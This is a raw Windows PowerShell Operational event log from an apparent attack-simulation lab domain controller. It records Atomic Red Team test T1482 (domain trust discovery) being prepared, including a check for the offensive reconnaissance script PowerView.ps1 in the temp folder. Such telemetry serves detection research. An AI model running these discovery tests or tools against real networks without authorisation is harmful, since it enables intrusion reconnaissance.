Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478500
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478499
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478498
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478497
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478496
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478495
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478494
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478493
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478492
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478491
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478490
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478489
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478488
Keywords=None
Message=Completed invocation of ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478487
Keywords=None
Message=Started invocation of ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478486
Keywords=None
Message=Started invocation of ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478485
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478484
Keywords=None
Message=Started invocation of ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478483
Keywords=None
Message=Started invocation of ScriptBlock ID: 6486e79f-85c1-448f-a72c-cd908b7c857d
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478482
Keywords=None
Message=Creating Scriptblock text (1 of 1):
Invoke-AtomicTest T1482 -GetPrereqs

ScriptBlock ID: 6486e79f-85c1-448f-a72c-cd908b7c857d
Path:
06/15/2021 05:06:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478481
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478725
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478724
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478723
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478722
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478721
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478720
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478719
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478718
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478717
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478716
Keywords=None
Message=Completed invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478715
Keywords=None
Message=Started invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478714
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478713
Keywords=None
Message=Completed invocation of ScriptBlock ID: ed63c229-e56a-4da8-b7eb-e58b65fe386b
Runspace ID: b507f821-e1fd-4735-be0b-0d646c7bc0c3
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478712
Keywords=None
Message=Completed invocation of ScriptBlock ID: eca2815b-bed0-4138-b375-ec995cc1b61a
Runspace ID: b507f821-e1fd-4735-be0b-0d646c7bc0c3
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478711
Keywords=None
Message=Completed invocation of ScriptBlock ID: 37aca944-dc14-4769-9be8-827c6a20aa92
Runspace ID: b507f821-e1fd-4735-be0b-0d646c7bc0c3
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478710
Keywords=None
Message=Started invocation of ScriptBlock ID: 37aca944-dc14-4769-9be8-827c6a20aa92
Runspace ID: b507f821-e1fd-4735-be0b-0d646c7bc0c3
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478709
Keywords=None
Message=Started invocation of ScriptBlock ID: eca2815b-bed0-4138-b375-ec995cc1b61a
Runspace ID: b507f821-e1fd-4735-be0b-0d646c7bc0c3
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478708
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}}

ScriptBlock ID: eca2815b-bed0-4138-b375-ec995cc1b61a
Path:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478707
Keywords=None
Message=Started invocation of ScriptBlock ID: ed63c229-e56a-4da8-b7eb-e58b65fe386b
Runspace ID: b507f821-e1fd-4735-be0b-0d646c7bc0c3
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478706
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}}

ScriptBlock ID: ed63c229-e56a-4da8-b7eb-e58b65fe386b
Path:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1478705
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1478704
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 4268 in AppDomain: DefaultAppDomain.
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1478703
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478702
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478701
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478700
Keywords=None
Message=Completed invocation of ScriptBlock ID: aa96185f-a969-4eb0-8620-1ec9990ffa42
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478699
Keywords=None
Message=Started invocation of ScriptBlock ID: aa96185f-a969-4eb0-8620-1ec9990ffa42
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478698
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: aa96185f-a969-4eb0-8620-1ec9990ffa42
Path:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478697
Keywords=None
Message=Completed invocation of ScriptBlock ID: f2f0af6f-bba5-4e15-9964-83ebb492ddea
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478696
Keywords=None
Message=Completed invocation of ScriptBlock ID: 0153528c-291e-46d1-9c23-eca4b32e1527
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478695
Keywords=None
Message=Completed invocation of ScriptBlock ID: fa1fa817-32fa-421f-9425-755a4634f1f5
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478694
Keywords=None
Message=Completed invocation of ScriptBlock ID: bd65515d-61c0-426c-8c16-4f58971f11fe
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478693
Keywords=None
Message=Started invocation of ScriptBlock ID: bd65515d-61c0-426c-8c16-4f58971f11fe
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478692
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: bd65515d-61c0-426c-8c16-4f58971f11fe
Path:
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478691
Keywords=None
Message=Completed invocation of ScriptBlock ID: 402c4d2e-7fbd-4381-8aa6-ef8c7db46cca
Runspace ID: deee7381-0f36-40ce-8695-b013c581f049
06/15/2021 05:06:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478690
Keywords=None
